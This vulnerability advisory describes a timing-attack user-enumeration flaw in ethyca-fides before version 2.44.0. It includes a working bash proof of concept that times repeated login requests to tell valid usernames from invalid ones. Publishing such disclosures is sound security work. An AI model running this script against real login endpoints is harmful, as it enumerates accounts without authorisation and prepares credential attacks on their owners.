Timing Attack Affecting ethyca-fides package, versions [,2.44.0)

ethyca-fides is an Open-source ecosystem for data privacy as code.

Affected versions of this package are vulnerable to Timing Attack due to the discrepancy in response times between valid and invalid usernames in the login endpoint. An attacker can determine the existence of valid usernames by analyzing the time it takes for the server to respond to login requests. By exploiting this vulnerability, an attacker can enumerate users on the system.

#!/bin/bash

# Function to test login and calculate average transfer times
test_login(){
  echo -e "\nTesting login for user: $1\n"
  total_diff=0

  for (( i=1; i <= 20; ++i ))
  do
    echo -n "Attempt #$i: "
    resp=$(curl -w @- "$LOGIN_URL" \
      -H 'content-type: application/json' \
      --data-raw '{"username":"'$1'","password":"d3JvbmdwYXNzd29yZA=="}' \
      -o /dev/null -s <<'EOF'
      {
        "pretransfer":  %{time_pretransfer},
        "starttransfer": %{time_starttransfer}
      }
EOF
    )
    
    pre=$(echo $resp | jq '.pretransfer')
    start=$(echo $resp | jq '.starttransfer')
    diff=$(echo "$start - $pre" | bc)

    # Accumulate total diff
    total_diff=$(echo "$total_diff + $diff" | bc)
    
    # Print the result of this iteration
    printf "Pretransfer: %.4f, Starttransfer: %.4f, Diff: %.4f\n" "$pre" "$start" "$diff"
  done
  
  # Calculate average diff
  avg_diff=$(echo "scale=4; $total_diff / 20" | bc)
  
  # Print average time
  echo -e "\nAverage Time Difference for $1: $avg_diff seconds\n"
}

# Ensure that LOGIN_URL is set
if [ -z "$LOGIN_URL" ]; then
  echo "Error: LOGIN_URL environment variable is not set."
  exit 1
fi

# Test valid and invalid users
test_login valid_user 
test_login invalid_user

• GitHub Commit